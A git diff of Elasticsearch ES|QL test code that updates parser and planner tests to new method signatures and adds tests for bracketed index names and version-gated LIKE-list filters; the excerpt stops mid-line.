+     *               GeoDistanceSort[field=location{f}#6094, direction=ASC, lat=55.673, lon=12.565]]] estimatedRowSize[249]
      *
      */
     public void testPushCompoundTopNDistanceWithCompoundFilterToSource() {
@@ -6400,9 +6421,9 @@ public void testPushCompoundTopNDistanceWithCompoundFilterToSource() {

         var exchange = asRemoteExchange(topN.child());
         project = as(exchange.child(), ProjectExec.class);
-        assertThat(names(project.projections()), contains("abbrev", "name", "location", "country", "city", "scalerank", "distance"));
+        assertThat(names(project.projections()), contains("abbrev", "city", "country", "location", "name", "scalerank", "distance"));
         var extract = as(project.child(), FieldExtractExec.class);
-        assertThat(names(extract.attributesToExtract()), contains("abbrev", "name", "country", "city", "scalerank"));
+        assertThat(names(extract.attributesToExtract()), contains("abbrev", "city", "country", "name", "scalerank"));
         var evalExec = as(extract.child(), EvalExec.class);
         var alias = as(evalExec.fields().get(0), Alias.class);
         assertThat(alias.name(), is("distance"));
@@ -7842,7 +7863,7 @@ private LocalExecutionPlanner.LocalExecutionPlan physicalOperationsFromPhysicalP
         // The TopN needs an estimated row size for the planner to work
         var plans = PlannerUtils.breakPlanBetweenCoordinatorAndDataNode(EstimatesRowSize.estimateRowSize(0, plan), config);
         plan = useDataNodePlan ? plans.v2() : plans.v1();
-        plan = PlannerUtils.localPlan(config, FoldContext.small(), plan, TEST_SEARCH_STATS);
+        plan = PlannerUtils.localPlan(new EsqlFlags(true), config, FoldContext.small(), plan, TEST_SEARCH_STATS);
         ExchangeSinkHandler exchangeSinkHandler = new ExchangeSinkHandler(null, 10, () -> 10);
         LocalExecutionPlanner planner = new LocalExecutionPlanner(
             "test",
@@ -7857,7 +7878,12 @@ private LocalExecutionPlanner.LocalExecutionPlan physicalOperationsFromPhysicalP
             null,
             null,
             null,
-            new EsPhysicalOperationProviders(FoldContext.small(), List.of(), null, DataPartitioning.AUTO),
+            new EsPhysicalOperationProviders(
+                FoldContext.small(),
+                List.of(),
+                null,
+                new PhysicalSettings(DataPartitioning.AUTO, ByteSizeValue.ofMb(1))
+            ),
             List.of()
         );
@@ -8040,7 +8066,7 @@ public void testNotEqualsPushdownToDelegate() {
      * ges{f}#5, last_name{f}#6, long_noidx{f}#12, salary{f}#7],false]
      *   \_ProjectExec[[_meta_field{f}#8, emp_no{f}#2, first_name{f}#3, gender{f}#4, hire_date{f}#9, job{f}#10, job.raw{f}#11, langua
      * ges{f}#5, last_name{f}#6, long_noidx{f}#12, salary{f}#7]]
-     *     \_FieldExtractExec[_meta_field{f}#8, emp_no{f}#2, first_name{f}#3, gen..]<[],[]>
+     *     \_FieldExtractExec[_meta_field{f}#8, emp_no{f}#2, first_name{f}#3, gen..]<[],[]>
      *       \_EsQueryExec[test], indexMode[standard],
      *         query[{"bool":{"filter":[{"sampling":{"probability":0.1,"seed":234,"hash":0}}],"boost":1.0}}]
      *         [_doc{f}#24], limit[1000], sort[] estimatedRowSize[332]
@@ -8209,7 +8235,7 @@ private PhysicalPlan optimizedPlan(PhysicalPlan plan, SearchStats searchStats) {
         // individually hence why here the plan is kept as is
         var l = p.transformUp(FragmentExec.class, fragment -> {
-            var localPlan = PlannerUtils.localPlan(config, FoldContext.small(), fragment, searchStats);
+            var localPlan = PlannerUtils.localPlan(new EsqlFlags(true), config, FoldContext.small(), fragment, searchStats);
             return EstimatesRowSize.estimateRowSize(fragment.estimatedRowSize(), localPlan);
         });

@@ -8247,7 +8273,7 @@ private PhysicalPlan physicalPlan(String query, TestDataSource dataSource) {
     }

     private PhysicalPlan physicalPlan(String query, TestDataSource dataSource, boolean assertSerialization) {
-        var logical = logicalOptimizer.optimize(dataSource.analyzer.analyze(parser.createStatement(query)));
+        var logical = logicalOptimizer.optimize(dataSource.analyzer.analyze(parser.createStatement(query, config)));
         // System.out.println("Logical\n" + logical);
         var physical = mapper.map(logical);
         // System.out.println("Physical\n" + physical);
diff --git a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/optimizer/TestPlannerOptimizer.java b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/optimizer/TestPlannerOptimizer.java
index e6a7d110f8c09..761902bebe19e 100644
--- a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/optimizer/TestPlannerOptimizer.java
+++ b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/optimizer/TestPlannerOptimizer.java
@@ -15,6 +15,7 @@
 import org.elasticsearch.xpack.esql.plan.physical.PhysicalPlan;
 import org.elasticsearch.xpack.esql.planner.PlannerUtils;
 import org.elasticsearch.xpack.esql.planner.mapper.Mapper;
+import org.elasticsearch.xpack.esql.plugin.EsqlFlags;
 import org.elasticsearch.xpack.esql.session.Configuration;
 import org.elasticsearch.xpack.esql.stats.SearchStats;

@@ -66,7 +67,7 @@ private PhysicalPlan optimizedPlan(PhysicalPlan plan, SearchStats searchStats) {
             new LocalLogicalOptimizerContext(config, FoldContext.small(), searchStats)
         );
         var physicalTestOptimizer = new TestLocalPhysicalPlanOptimizer(
-            new LocalPhysicalOptimizerContext(config, FoldContext.small(), searchStats),
+            new LocalPhysicalOptimizerContext(new EsqlFlags(true), config, FoldContext.small(), searchStats),
             true
         );
         var l = PlannerUtils.localPlan(physicalPlan, logicalTestOptimizer, physicalTestOptimizer);
@@ -79,7 +80,7 @@ private PhysicalPlan optimizedPlan(PhysicalPlan plan, SearchStats searchStats) {
     }

     private PhysicalPlan physicalPlan(String query, Analyzer analyzer) {
-        var logical = logicalOptimizer.optimize(analyzer.analyze(parser.createStatement(query)));
+        var logical = logicalOptimizer.optimize(analyzer.analyze(parser.createStatement(query, EsqlTestUtils.TEST_CFG)));
         // System.out.println("Logical\n" + logical);
         var physical = mapper.map(logical);
         return physical;
diff --git a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/optimizer/rules/logical/PropagateInlineEvalsTests.java b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/optimizer/rules/logical/PropagateInlineEvalsTests.java
index 088b5c1c9205e..a7451ea2f5109 100644
--- a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/optimizer/rules/logical/PropagateInlineEvalsTests.java
+++ b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/optimizer/rules/logical/PropagateInlineEvalsTests.java
@@ -169,7 +169,7 @@ public void testGroupingAliasingMoved_To_LeftSideOfJoin_WithExpression() {
     }

     private LogicalPlan plan(String query, LogicalPlanOptimizer optimizer) {
-        return optimizer.optimize(analyzer.analyze(parser.createStatement(query)));
+        return optimizer.optimize(analyzer.analyze(parser.createStatement(query, EsqlTestUtils.TEST_CFG)));
     }

     @Override
diff --git a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/optimizer/rules/physical/local/PushTopNToSourceTests.java b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/optimizer/rules/physical/local/PushTopNToSourceTests.java
index cacf6e422882b..00f8dfb9aaacc 100644
--- a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/optimizer/rules/physical/local/PushTopNToSourceTests.java
+++ b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/optimizer/rules/physical/local/PushTopNToSourceTests.java
@@ -35,6 +35,7 @@
 import org.elasticsearch.xpack.esql.plan.physical.EvalExec;
 import org.elasticsearch.xpack.esql.plan.physical.PhysicalPlan;
 import org.elasticsearch.xpack.esql.plan.physical.TopNExec;
+import org.elasticsearch.xpack.esql.plugin.EsqlFlags;
 import org.elasticsearch.xpack.esql.stats.SearchStats;

 import java.io.IOException;
@@ -416,7 +417,7 @@ private static void assertNoPushdownSort(TestPhysicalPlanBuilder builder, String

     private static PhysicalPlan pushTopNToSource(TopNExec topNExec) {
         var configuration = EsqlTestUtils.configuration("from test");
-        var ctx = new LocalPhysicalOptimizerContext(configuration, FoldContext.small(), SearchStats.EMPTY);
+        var ctx = new LocalPhysicalOptimizerContext(new EsqlFlags(true), configuration, FoldContext.small(), SearchStats.EMPTY);
         var pushTopNToSource = new PushTopNToSource();
         return pushTopNToSource.rule(topNExec, ctx);
     }
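The parser-test files below all apply the same mechanical migration: EsqlParser.createStatement now also takes a Configuration, and the tests pass the shared fixture. In one line:

    // old: parser.createStatement(query)
    var logical = logicalOptimizer.optimize(analyzer.analyze(parser.createStatement(query, EsqlTestUtils.TEST_CFG)));
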
diff --git a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/parser/AbstractStatementParserTests.java b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/parser/AbstractStatementParserTests.java
index 462b9f7373ecf..07ab624e4a2a9 100644
--- a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/parser/AbstractStatementParserTests.java
+++ b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/parser/AbstractStatementParserTests.java
@@ -11,6 +11,7 @@
 import org.elasticsearch.common.lucene.BytesRefs;
 import org.elasticsearch.index.IndexMode;
 import org.elasticsearch.test.ESTestCase;
+import org.elasticsearch.xpack.esql.EsqlTestUtils;
 import org.elasticsearch.xpack.esql.VerificationException;
 import org.elasticsearch.xpack.esql.core.expression.Expression;
 import org.elasticsearch.xpack.esql.core.expression.Literal;
@@ -57,11 +58,11 @@ LogicalPlan statement(String e) {
     }

     LogicalPlan statement(String e, QueryParams params) {
-        return parser.createStatement(e, params);
+        return parser.createStatement(e, params, EsqlTestUtils.TEST_CFG);
     }

     LogicalPlan processingCommand(String e) {
-        return parser.createStatement("row a = 1 | " + e);
+        return parser.createStatement("row a = 1 | " + e, EsqlTestUtils.TEST_CFG);
     }

     static UnresolvedAttribute attribute(String name) {
@@ -170,7 +171,7 @@ void expectVerificationError(String query, String errorMessage) {
             "Query [" + query + "] is expected to throw " + VerificationException.class + " with message [" + errorMessage + "]",
             VerificationException.class,
             containsString(errorMessage),
-            () -> parser.createStatement(query)
+            () -> parser.createStatement(query, EsqlTestUtils.TEST_CFG)
         );
     }
diff --git a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/parser/ExpressionTests.java b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/parser/ExpressionTests.java
index c39dc70f3ad39..0696f2c99e03e 100644
--- a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/parser/ExpressionTests.java
+++ b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/parser/ExpressionTests.java
@@ -9,6 +9,7 @@
 import org.elasticsearch.common.lucene.BytesRefs;
 import org.elasticsearch.test.ESTestCase;
+import org.elasticsearch.xpack.esql.EsqlTestUtils;
 import org.elasticsearch.xpack.esql.core.expression.Alias;
 import org.elasticsearch.xpack.esql.core.expression.Expression;
 import org.elasticsearch.xpack.esql.core.expression.FoldContext;
@@ -659,7 +660,7 @@ private Project projectExpression(String e) {
     }

     private LogicalPlan parse(String s) {
-        return parser.createStatement(s);
+        return parser.createStatement(s, EsqlTestUtils.TEST_CFG);
     }

     private Literal l(Object value, DataType type) {
diff --git a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/parser/GrammarInDevelopmentParsingTests.java b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/parser/GrammarInDevelopmentParsingTests.java
index f31d9ee58c268..14ded33e297ee 100644
--- a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/parser/GrammarInDevelopmentParsingTests.java
+++ b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/parser/GrammarInDevelopmentParsingTests.java
@@ -8,6 +8,7 @@
 package org.elasticsearch.xpack.esql.parser;

 import org.elasticsearch.test.ESTestCase;
+import org.elasticsearch.xpack.esql.EsqlTestUtils;

 import static org.hamcrest.Matchers.containsString;
 import static org.hamcrest.Matchers.not;
@@ -35,7 +36,7 @@ public void testDevelopmentRerank() {
     }

     void parse(String query, String errorMessage) {
-        ParsingException pe = expectThrows(ParsingException.class, () -> parser().createStatement(query));
+        ParsingException pe = expectThrows(ParsingException.class, () -> parser().createStatement(query, EsqlTestUtils.TEST_CFG));
         assertThat(pe.getMessage(), containsString("mismatched input '" + errorMessage + "'"));
         // check the parser eliminated the DEV_ tokens from the message
         assertThat(pe.getMessage(), not(containsString("DEV_")));
diff --git a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/parser/StatementParserTests.java b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/parser/StatementParserTests.java
index 108059ac2c883..c2ce416a90c8a 100644
--- a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/parser/StatementParserTests.java
+++ b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/parser/StatementParserTests.java
@@ -13,6 +13,7 @@
 import org.elasticsearch.common.lucene.BytesRefs;
 import org.elasticsearch.core.Tuple;
 import org.elasticsearch.index.IndexMode;
+import org.elasticsearch.xpack.esql.EsqlTestUtils;
 import org.elasticsearch.xpack.esql.action.EsqlCapabilities;
 import org.elasticsearch.xpack.esql.core.capabilities.UnresolvedException;
 import org.elasticsearch.xpack.esql.core.expression.Alias;
@@ -945,10 +946,6 @@ public void testBasicLimitCommand() {
         assertThat(limit.children().get(0).children().get(0), instanceOf(UnresolvedRelation.class));
     }

-    public void testLimitConstraints() {
-        expectError("from text | limit -1", "line 1:13: Invalid value for LIMIT [-1], expecting a non negative integer");
-    }
-
     public void testBasicSortCommand() {
         LogicalPlan plan = statement("from text | where true | sort a+b asc nulls first, x desc nulls last | sort y asc | sort z desc");
         assertThat(plan, instanceOf(OrderBy.class));
@@ -3176,7 +3173,7 @@ public void testValidJoinPattern() {
     }

     public void testInvalidFromPatterns() {
-        var sourceCommands = new String[] { "FROM", "TS" };
+        var sourceCommands = Build.current().isSnapshot() ? new String[] { "FROM", "TS" } : new String[] { "FROM" };
         var indexIsBlank = "Blank index specified in index pattern";
         var remoteIsEmpty = "remote part is empty";
         var invalidDoubleColonUsage = "invalid usage of :: separator";
@@ -3839,7 +3836,7 @@ public void testRerankWithPositionalParameters() {
             List.of(paramAsConstant(null, "query text"), paramAsConstant(null, "reranker"), paramAsConstant(null, "rerank_score"))
         );
         var rerank = as(
-            parser.createStatement("row a = 1 | RERANK ? ON title WITH inferenceId=?, scoreColumn=? ", queryParams),
+            parser.createStatement("row a = 1 | RERANK ? ON title WITH inferenceId=?, scoreColumn=? ", queryParams, EsqlTestUtils.TEST_CFG),
             Rerank.class
         );

@@ -3862,7 +3859,8 @@ public void testRerankWithNamedParameters() {
         var rerank = as(
             parser.createStatement(
                 "row a = 1 | RERANK ?queryText ON title WITH inferenceId=?inferenceId, scoreColumn=?scoreColumnName",
-                queryParams
+                queryParams,
+                EsqlTestUtils.TEST_CFG
             ),
             Rerank.class
         );
@@ -3910,7 +3908,10 @@ public void testCompletionDefaultFieldName() {

     public void testCompletionWithPositionalParameters() {
         var queryParams = new QueryParams(List.of(paramAsConstant(null, "inferenceId")));
-        var plan = as(parser.createStatement("row a = 1 | COMPLETION prompt_field WITH ?", queryParams), Completion.class);
+        var plan = as(
+            parser.createStatement("row a = 1 | COMPLETION prompt_field WITH ?", queryParams, EsqlTestUtils.TEST_CFG),
+            Completion.class
+        );

         assertThat(plan.prompt(), equalTo(attribute("prompt_field")));
         assertThat(plan.inferenceId(), equalTo(literalString("inferenceId")));
@@ -3919,7 +3920,10 @@ public void testCompletionWithNamedParameters() {
         var queryParams = new QueryParams(List.of(paramAsConstant("inferenceId", "myInference")));
-        var plan = as(parser.createStatement("row a = 1 | COMPLETION prompt_field WITH ?inferenceId", queryParams), Completion.class);
+        var plan = as(
+            parser.createStatement("row a = 1 | COMPLETION prompt_field WITH ?inferenceId", queryParams, EsqlTestUtils.TEST_CFG),
+            Completion.class
+        );

         assertThat(plan.prompt(), equalTo(attribute("prompt_field")));
         assertThat(plan.inferenceId(), equalTo(literalString("myInference")));
@@ -4733,4 +4737,74 @@ public void testUnclosedParenthesis() {
             expectError(q, "Invalid query");
         }
     }
+
+    public void testBracketsInIndexNames() {
+
+        List<String> patterns = List.of(
+            "(",
+            ")",
+            "()",
+            "(((",
+            ")))",
+            "(test",
+            "test)",
+            "(test)",
+            "te()st",
+            "concat(foo,bar)",
+            "((((()))))",
+            "(((abc)))",
+            "*()*",
+            "*test()*"
+        );
+
+        for (String pattern : patterns) {
+            expectErrorForBracketsWithoutQuotes(pattern);
+            expectSuccessForBracketsWithinQuotes(pattern);
+        }
+
+        expectError("from test)", "line 1:10: extraneous input ')' expecting ");
+        expectError("from te()st", "line 1:8: token recognition error at: '('");
+        expectError("from test | enrich foo)", "line -1:-1: Invalid query [from test | enrich foo)]");
+        expectError("from test | lookup join foo) on bar", "line 1:28: token recognition error at: ')'");
+    }
+
+    private void expectErrorForBracketsWithoutQuotes(String pattern) {
+        expectThrows(ParsingException.class, () -> processingCommand("from " + pattern));
+
+        expectThrows(ParsingException.class, () -> processingCommand("from *:" + pattern));
+
+        expectThrows(ParsingException.class, () -> processingCommand("from remote1:" + pattern + ",remote2:" + pattern));
+
+        expectThrows(ParsingException.class, () -> processingCommand("from test | lookup join " + pattern + " on bar"));
+
+        expectThrows(ParsingException.class, () -> processingCommand("from test | enrich " + pattern));
+    }
+
+    private void expectSuccessForBracketsWithinQuotes(String indexName) {
+        LogicalPlan plan = statement("from \"" + indexName + "\"");
+        UnresolvedRelation from = as(plan, UnresolvedRelation.class);
+        assertThat(from.indexPattern().indexPattern(), is(indexName));
+
+        plan = statement("from \"*:" + indexName + "\"");
+        from = as(plan, UnresolvedRelation.class);
+        assertThat(from.indexPattern().indexPattern(), is("*:" + indexName));
+
+        plan = statement("from \"remote1:" + indexName + ",remote2:" + indexName + "\"");
+        from = as(plan, UnresolvedRelation.class);
+        assertThat(from.indexPattern().indexPattern(), is("remote1:" + indexName + ",remote2:" + indexName));
+
+        plan = statement("from test | enrich \"" + indexName + "\"");
+        Enrich enrich = as(plan, Enrich.class);
+        assertThat(enrich.policyName().fold(FoldContext.small()), is(BytesRefs.toBytesRef(indexName)));
+        as(enrich.child(), UnresolvedRelation.class);
+
+        if (indexName.contains("*")) {
+            expectThrows(ParsingException.class, () -> processingCommand("from test | lookup join \"" + indexName + "\" on bar"));
+        } else {
+            plan = statement("from test | lookup join \"" + indexName + "\" on bar");
+            LookupJoin lookup = as(plan, LookupJoin.class);
+            UnresolvedRelation right = as(lookup.right(), UnresolvedRelation.class);
+            assertThat(right.indexPattern().indexPattern(), is(indexName));
+        }
+    }
 }
diff --git a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/planner/FilterTests.java b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/planner/FilterTests.java
index 04d2cac31af55..f29d3928384b9 100644
--- a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/planner/FilterTests.java
+++ b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/planner/FilterTests.java
@@ -7,6 +7,7 @@

 package org.elasticsearch.xpack.esql.planner;

+import org.elasticsearch.TransportVersion;
 import org.elasticsearch.common.bytes.BytesReference;
 import org.elasticsearch.common.io.stream.ByteBufferStreamInput;
 import org.elasticsearch.common.io.stream.BytesStreamOutput;
@@ -28,8 +29,10 @@
 import org.elasticsearch.xpack.esql.expression.function.EsqlFunctionRegistry;
 import org.elasticsearch.xpack.esql.index.EsIndex;
 import org.elasticsearch.xpack.esql.index.IndexResolution;
+import org.elasticsearch.xpack.esql.io.stream.ExpressionQueryBuilder;
 import org.elasticsearch.xpack.esql.io.stream.PlanStreamInput;
 import org.elasticsearch.xpack.esql.io.stream.PlanStreamOutput;
+import org.elasticsearch.xpack.esql.io.stream.PlanStreamWrapperQueryBuilder;
 import org.elasticsearch.xpack.esql.optimizer.LogicalPlanOptimizer;
 import org.elasticsearch.xpack.esql.optimizer.PhysicalOptimizerContext;
 import org.elasticsearch.xpack.esql.optimizer.PhysicalPlanOptimizer;
@@ -37,6 +40,7 @@
 import org.elasticsearch.xpack.esql.plan.physical.FragmentExec;
 import org.elasticsearch.xpack.esql.plan.physical.PhysicalPlan;
 import org.elasticsearch.xpack.esql.planner.mapper.Mapper;
+import org.elasticsearch.xpack.esql.plugin.EsqlFlags;
 import org.elasticsearch.xpack.esql.querydsl.query.SingleValueQuery;
 import org.elasticsearch.xpack.esql.session.Configuration;
 import org.junit.BeforeClass;
@@ -45,8 +49,10 @@
 import java.io.UncheckedIOException;
 import java.util.List;
 import java.util.Map;
+import java.util.Set;

 import static java.util.Arrays.asList;
+import static org.elasticsearch.TransportVersions.V_8_17_0;
 import static org.elasticsearch.index.query.QueryBuilders.rangeQuery;
 import static org.elasticsearch.xpack.esql.ConfigurationTestUtils.randomConfiguration;
 import static org.elasticsearch.xpack.esql.EsqlTestUtils.TEST_VERIFIER;
@@ -65,6 +71,7 @@ public class FilterTests extends ESTestCase {

     // use a field that already exists in the mapping
     private static final String EMP_NO = "emp_no";
+    private static final String LAST_NAME = "last_name";
     private static final String OTHER_FIELD = "salary";

     private static EsqlParser parser;
@@ -104,7 +111,7 @@ public void testTimestampRequestFilterNoQueryFilter() {
             |WHERE {} > 10
             """, OTHER_FIELD), restFilter);

-        var filter = filterQueryForTransportNodes(plan);
+        var filter = filterQueryForTransportNodes(TransportVersion.current(), plan);
         assertEquals(restFilter.toString(), filter.toString());
     }

@@ -117,7 +124,7 @@ public void testTimestampNoRequestFilterQueryFilter() {
             """, EMP_NO, value);

         var plan = plan(query, null);
-        var filter = filterQueryForTransportNodes(plan);
+        var filter = filterQueryForTransportNodes(TransportVersion.current(), plan);
         var expected = singleValueQuery(query, unscore(rangeQuery(EMP_NO).gt(value)), EMP_NO, ((SingleValueQuery.Builder) filter).source());
         assertEquals(expected.toString(), filter.toString());
     }

@@ -132,7 +139,7 @@ public void testTimestampRequestFilterQueryFilter() {
             """, EMP_NO, value);

         var plan = plan(query, restFilter);
-        var filter = filterQueryForTransportNodes(plan);
+        var filter = filterQueryForTransportNodes(TransportVersion.current(), plan);
         var builder = ((BoolQueryBuilder) filter).filter().get(1);
         var queryFilter = singleValueQuery(
             query,
@@ -155,7 +162,7 @@ public void testTimestampRequestFilterQueryFilterWithConjunction() {
             """, EMP_NO, lowValue, EMP_NO, highValue);

         var plan = plan(query, restFilter);
-        var filter = filterQueryForTransportNodes(plan);
+        var filter = filterQueryForTransportNodes(TransportVersion.current(), plan);
         var musts = ((BoolQueryBuilder) ((BoolQueryBuilder) filter).filter().get(1)).must();
         var left = singleValueQuery(
             query,
@@ -184,7 +191,7 @@ public void testTimestampRequestFilterQueryFilterWithDisjunctionOnDifferentField
             |WHERE {} > {} OR {} < {}
             """, OTHER_FIELD, lowValue, EMP_NO, highValue), restFilter);

-        var filter = filterQueryForTransportNodes(plan);
+        var filter = filterQueryForTransportNodes(TransportVersion.current(), plan);
         var expected = restFilter;
         assertEquals(expected.toString(), filter.toString());
     }

@@ -200,7 +207,7 @@ public void testTimestampRequestFilterQueryFilterWithDisjunctionOnSameField() {
             """, EMP_NO, lowValue, EMP_NO, highValue);

         var plan = plan(query, restFilter);
-        var filter = filterQueryForTransportNodes(plan);
+        var filter = filterQueryForTransportNodes(TransportVersion.current(), plan);
         var shoulds = ((BoolQueryBuilder) ((BoolQueryBuilder) filter).filter().get(1)).should();
         var left = singleValueQuery(
             query,
@@ -231,7 +238,7 @@ public void testTimestampRequestFilterQueryFilterWithMultiConjunction() {
             """, EMP_NO, lowValue, OTHER_FIELD, eqValue, EMP_NO, highValue);

         var plan = plan(query, restFilter);
-        var filter = filterQueryForTransportNodes(plan);
+        var filter = filterQueryForTransportNodes(TransportVersion.current(), plan);
         var musts = ((BoolQueryBuilder) ((BoolQueryBuilder) filter).filter().get(1)).must();
         var left = singleValueQuery(
             query,
@@ -265,7 +272,7 @@ public void testTimestampRequestFilterQueryMultipleFilters() {
             """, EMP_NO, lowValue, EMP_NO, eqValue, EMP_NO, highValue);

         var plan = plan(query, restFilter);
-        var filter = filterQueryForTransportNodes(plan);
+        var filter = filterQueryForTransportNodes(TransportVersion.current(), plan);
         var builder = ((BoolQueryBuilder) filter).filter().get(1);
         var queryFilter = singleValueQuery(
             query,
@@ -286,7 +293,7 @@ public void testTimestampOverriddenFilterFilter() {
             |WHERE {} > {}
             """, EMP_NO, OTHER_FIELD, EMP_NO, eqValue), null);

-        var filter = filterQueryForTransportNodes(plan);
+        var filter = filterQueryForTransportNodes(TransportVersion.current(), plan);
         assertThat(filter, nullValue());
     }

@@ -298,7 +305,7 @@ public void testTimestampAsFunctionArgument() {
             |WHERE to_int(to_string({})) == {}
             """, EMP_NO, eqValue), null);

-        var filter = filterQueryForTransportNodes(plan);
+        var filter = filterQueryForTransportNodes(TransportVersion.current(), plan);
         assertThat(filter, nullValue());
     }
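The hunk below adds the version-gated tests; condensed, the gate they pin down is:

    // A LIKE ("a+", "b+") filter is not serializable to nodes on the 8.17-era
    // transport version, so filter extraction must return null for them.
    assertNull(filterQueryForTransportNodes(V_8_17_0, plan));
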
@@ -310,10 +317,43 @@ public void testTimestampAsFunctionArgumentInsideExpression() {
             |WHERE to_int(to_string({})) + 987 == {}
             """, EMP_NO, eqValue), null);

-        var filter = filterQueryForTransportNodes(plan);
+        var filter = filterQueryForTransportNodes(TransportVersion.current(), plan);
         assertThat(filter, nullValue());
     }

+    public void testLikeList() {
+        String query = LoggerMessageFormat.format(null, """
+            FROM test
+            |WHERE {} LIKE ("a+", "b+")
+            """, LAST_NAME);
+        var plan = plan(query, null);
+        // test with an older version, so like list is not supported
+        var filter = filterQueryForTransportNodes(V_8_17_0, plan);
+        assertNull(filter);
+    }
+
+    /**
+     * Tests that we can extract a filter if the transport
+     * version is {@code null}. This isn't run in the "filter for transport nodes"
+     * code path. Instead, it's in the "filter for the local node" path, but
+     * we can get a quick test of that by calling this setup.
+     */
+    public void testLikeListNullTransportVersion() {
+        String query = LoggerMessageFormat.format(null, """
+            FROM test
+            |WHERE {} LIKE ("a+", "b+")
+            """, LAST_NAME);
+        var plan = plan(query, null);
+
+        PlanStreamWrapperQueryBuilder filterWrapper = (PlanStreamWrapperQueryBuilder) filterQueryForTransportNodes(null, plan);
+        SingleValueQuery.Builder filter = (SingleValueQuery.Builder) filterWrapper.next();
+        assertEquals(LAST_NAME, filter.fieldName());
+        ExpressionQueryBuilder innerFilter = (ExpressionQueryBuilder) filter.next();
+        assertEquals(LAST_NAME, innerFilter.fieldName());
+        assertEquals("""
+            last_name LIKE ("a+", "b+")""", innerFilter.getExpression().toString());
+    }
+
     /**
      * Ugly hack to create a QueryBuilder for SingleValueQuery.
      * For some reason however the queryName is set to null on range queries when deserializing.
@@ -342,7 +382,7 @@ public static QueryBuilder singleValueQuery(String query, QueryBuilder inner, St } private PhysicalPlan plan(String query, QueryBuilder restFilter) { - var logical = logicalOptimizer.optimize(analyzer.analyze(parser.createStatement(query))); + var logical = logicalOptimizer.optimize(analyzer.analyze(parser.createStatement(query, EsqlTestUtils.TEST_CFG))); // System.out.println("Logical\n" + logical); var physical = mapper.map(logical); // System.out.println("physical\n" + physical); @@ -360,8 +400,8 @@ private QueryBuilder restFilterQuery(String field) { return unscore(rangeQuery(field).lt("2020-12-34")); } - private QueryBuilder filterQueryForTransportNodes(PhysicalPlan plan) { - return PlannerUtils.detectFilter(plan, EMP_NO::equals); + private QueryBuilder filterQueryForTransportNodes(TransportVersion minTransportVersion, PhysicalPlan plan) { + return PlannerUtils.detectFilter(new EsqlFlags(true), null, minTransportVersion, plan, Set.of(EMP_NO, LAST_NAME)::contains); } @Override diff --git a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/planner/LocalExecutionPlannerTests.java b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/planner/LocalExecutionPlannerTests.java index 9bc2118c0451f..b56f4a3a4898b 100644 --- a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/planner/LocalExecutionPlannerTests.java +++ b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/planner/LocalExecutionPlannerTests.java @@ -19,11 +19,12 @@ import org.apache.lucene.tests.index.RandomIndexWriter; import org.elasticsearch.cluster.ClusterName; import org.elasticsearch.common.settings.Settings; +import org.elasticsearch.common.unit.ByteSizeValue; import org.elasticsearch.common.util.BigArrays; import org.elasticsearch.compute.lucene.DataPartitioning; import org.elasticsearch.compute.lucene.LuceneSourceOperator; import org.elasticsearch.compute.lucene.LuceneTopNSourceOperator; -import org.elasticsearch.compute.lucene.ValuesSourceReaderOperator; +import org.elasticsearch.compute.lucene.read.ValuesSourceReaderOperator; import org.elasticsearch.compute.operator.SourceOperator; import org.elasticsearch.compute.test.NoOpReleasable; import org.elasticsearch.compute.test.TestBlockFactory; @@ -340,7 +341,12 @@ private Configuration config() { } private EsPhysicalOperationProviders esPhysicalOperationProviders(List shardContexts) { - return new EsPhysicalOperationProviders(FoldContext.small(), shardContexts, null, DataPartitioning.AUTO); + return new EsPhysicalOperationProviders( + FoldContext.small(), + shardContexts, + null, + new PhysicalSettings(DataPartitioning.AUTO, ByteSizeValue.ofMb(1)) + ); } private List createShardContexts() throws IOException { diff --git a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/plugin/ClusterRequestTests.java b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/plugin/ClusterRequestTests.java index ababc8ed37657..65587cf4d6876 100644 --- a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/plugin/ClusterRequestTests.java +++ b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/plugin/ClusterRequestTests.java @@ -201,7 +201,7 @@ static LogicalPlan parse(String query) { ), TEST_VERIFIER ); - return logicalOptimizer.optimize(analyzer.analyze(new 